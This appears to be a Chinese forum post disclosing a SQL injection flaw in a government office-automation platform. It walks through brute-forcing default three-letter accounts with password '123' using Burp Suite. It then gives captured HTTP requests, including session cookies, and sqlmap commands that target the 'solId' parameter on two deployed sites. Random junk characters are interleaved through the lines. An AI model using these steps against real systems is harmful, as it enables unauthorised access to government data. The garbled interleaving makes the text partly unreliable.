& i* D! V9 H, R! ^7 [0 n7 x$ g3 T
* q2 k. f6 |; t/ N U. U I5 A* u
1 g% l& [6 l! }+ Z1 d/ ?9 ?3 b3 E
2 w% G2 _# l- U7 T6 g" H 平台简介:
" i; `5 J. n& Q. N* O5 P: x, t! t
% m# V* M6 ~5 @: ]2 r. ?) G ]3 p! a" q l3 I- @0 N
( u, y- Q) K3 [. \: f0 G# r" x
# e% W U" V6 b5 U8 A- [$ `, x+ L5 a8 c$ D' d' w! k4 Q1 @$ @+ f
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
& Y; t% e& W8 G* }7 B同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
2 a+ Y5 y/ |' b同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
( u: p2 I& m" J: e+ i! L
1 T# s# A4 B2 M! A
G. Y5 P/ s! ]1 J% A, w - m( L* w/ S: H+ m, `
" V: H: }9 U; ?0 c+ r' K6 h
2 ^+ D* x! u1 Y; S: |3 |$ i3 W
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
; f5 ?" d6 f( U' v, `. o
( I* `0 o: r" b( h5 ?9 ~# A; V `
) K$ Y1 s4 x. L! [7 f, v! B3 ~ . E# w8 H" A; s
4 W- I1 E3 @, `$ N4 H$ L$ _
% F1 Z$ f/ v& N9 {: }: M9 g, V2 s http://1.1.1.1:7197/cap-aco/#(案例2-)
) X4 o' N8 E4 m; u4 Q8 G
6 L" U' H( b4 _1 U+ B' m8 {" O: }1 m4 L! r$ W" d7 Q; i k
http://www.XXOO.com (案例1-官网网站)
' b1 K, {6 F2 P4 ?
' p" L3 K1 ]: s6 T @. `
& Q/ e! n& w2 {8 {1 Z+ k0 ]8 o 2 n% K- b2 ]! w
: R3 N4 Z7 u( p' f$ b' ?( g$ A2 F4 c' {7 `
漏洞详情:
$ R1 |. h. ^0 t T1 w" L6 z0 a
! X' g1 `0 D% J. ?8 b" `0 {+ H
# X% r( ?, e% z C& Y$ r n 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 v' ]; b9 G5 C7 U- @
) g; ~2 K, P' M- e
: y0 m U4 f9 ~4 j. E9 @3 y
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
5 x$ D+ a/ j5 D3 H8 a- V
( ?7 z/ r7 m( c' }, y' _' G- L2 d, {. [0 {" l
/ f: k: D4 b: x& t3 @# B + v: {3 F. }/ m! H* o+ D8 v
4 X, N. m& D/ u
- S4 {6 q7 V7 a: ?/ ^9 {# } V2 o
7 @ ^% s2 C! V7 Q9 c- Z8 a7 h
+ q0 _) s1 G' c5 b status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
& a- b4 A- D, w- S
. \( M' e$ a, ?! l
) v) ]3 N. w% }5 | 1、案例1-官方网站3 |) G9 ^2 |3 k+ `3 l* X. K# z* ?
- M' y z* S2 K' I. H) R( G( {
! w- O. Z% e8 Z5 l( O8 m
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1. b% j0 I. Q' x% I
9 a8 T. u& j& e. \+ B+ C) t& S# I* ^6 b2 v+ b8 r6 E, \2 \/ B2 G
Host: www.XXOO.com( u# r& Y1 ]' }( _ r8 R1 c2 S
0 Q8 _; p% w& c' Q6 F& G
: b/ P j2 K& d3 R2 y Proxy-Connection: Keep-Alive
) `% R# j- s1 K4 x9 m * I3 V6 U ^5 F' T- M4 H
) M a, [0 h- I% r0 n. b( }1 L
Accept: application/json, text/javascript, */*; q=0.01
% K- r5 H5 o1 D: g# ]+ E4 x 2 V$ A! _* i. `9 x! l: d; E. ^
0 f, u5 I ^- X+ }! x0 F& V8 F* k Accept-Language: zh-CN
. `; \8 @# x: R# m ! P; ^2 E$ I4 r# J8 L
. m0 @: t( w* B
Content-Type: application/json8 v8 [9 S. B$ J
8 b ^# e7 h# r$ {" m$ c
! g f, H t$ n6 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
7 s. Y. g: I! W' E
' \$ g+ M& q) R3 n, _1 {9 o. w, C7 c5 [0 t- L
X-Requested-With: XMLHttpRequest
1 T+ p, e% k1 k; ]) I1 X0 T ) `) ?( Y8 \+ G/ v& M- }# l
& E- q- G, G3 }9 j% l# O+ r. v6 Z
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M0027 w7 B: F$ x: E
$ f0 w, |3 i' U9 q/ P
$ [: D- i5 r0 y
Accept-Encoding: gzip, deflate, sdch
; D4 }2 I- P. Q) S) E o/ W
! ~! u+ f9 ]; m' d. h5 n/ ]% Q
0 e- c+ }0 ~ f Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
" ?1 S7 W) Z- D! V& s* H
+ g3 l1 P2 K. ~) M7 ~" t s+ E0 M* A( x4 y% }3 {2 [
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
, |' [9 ]: ^$ U7 J4 X 5 H/ O5 ?; T" G$ e+ Y4 x3 P
+ S! m5 w B1 K# k; x" a8 Q8 d
; m3 c+ O+ w& w1 G, X
$ N: z8 u) q5 Y. m) U
/ h7 s* y0 M% Y2 L6 C: W/ ?4 t
, H8 L0 \) X; ?# r$ Z4 m0 x
) K5 {* j' ? p* j5 U
6 l( ~, i8 F9 v- b( ^8 D; q w: G
: y3 I" [$ y% b- `3 V
, H2 Z F4 H) _9 Q7 A o" O# ]6 R. R( L
: y; ?4 E H1 r6 i! M
q: I1 {2 }6 p% B( H& f# a5 R
* e0 X' }4 X0 w$ {7 O4 l* D * ?; n& \; a# q* m/ K
' D' M8 B+ B, j; l0 j1 a. {9 `; f$ I0 `% }: ]" B5 E( V+ ^6 L
2、案例2-某天河云平台1 p( |; ], c; Y+ E' g7 V: t
) ? ? j" e( {9 \9 a9 U
5 N7 i: ?# w f3 o
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
! w5 U( d6 K1 v8 S! L3 g8 Z
1 S ?" @' H9 ]8 i& s: b4 ? R
/ Z9 b1 z% H8 i3 q6 h Host: 1.1.1.:7197+ Y4 F2 d* T9 u3 Z; o# v6 ?& e
* c6 ^/ h j" D& q( H7 N, h% L; \: I1 ]8 E$ V
Accept: application/json, text/javascript, */*; q=0.01 v4 A# I9 C) d$ K" Y% v
( }' `) y6 y4 ^& ~ D1 |# s& |3 F+ h
! f1 i) b" H# d; k) d$ L X-Requested-With: XMLHttpRequest/ ~ Y2 d% e# F6 d1 ~
* `- W" S( x. W, A
7 W, Y* @- w) T/ _: O% b2 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.07 @( \; ^/ C- H
! @- R5 b# h: A
/ T/ \ ]5 r/ j8 W! T Content-Type: application/json
6 |; a% E, U1 f ) D# o1 _; {6 d, ~; ]
( a7 R: c! J3 x3 o7 P
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10089 [( E# b) j" ?& k$ r$ \5 B
5 M+ @# G2 E+ Y4 Z' `: z
; T' [! U, \* Z4 G6 c/ e U- p( P* q Accept-Language: zh-CN,zh;q=0.8
( @0 G" f) A N4 Z1 M' ?9 R & n% ^/ q" f3 R( J& u. G R5 |
; N8 S$ o, l1 U0 C
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
( `1 b! v$ O/ u2 @
+ j; I# n. |% o+ B ~' S
+ w" @4 H4 y1 q; D* L8 k3 g Connection: close) f% _8 ^0 n) D' r2 U) m" X
8 ^+ A. m0 w" Y7 r* G
1 M. V! s+ t Z+ [0 q$ @
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
m! f. D5 p# f) z0 T+ k6 @- d; e% D+ J( E
( z2 X% T5 h: W0 w. R/ k' T; H) o2 S% g& M) O; I
/ X3 c) V* N+ x
& r3 S3 }) g: i6 K0 `+ `1 J& K' ?7 ?9 x4 f" g
5 N" K, z" q$ _* P/ ]- X
|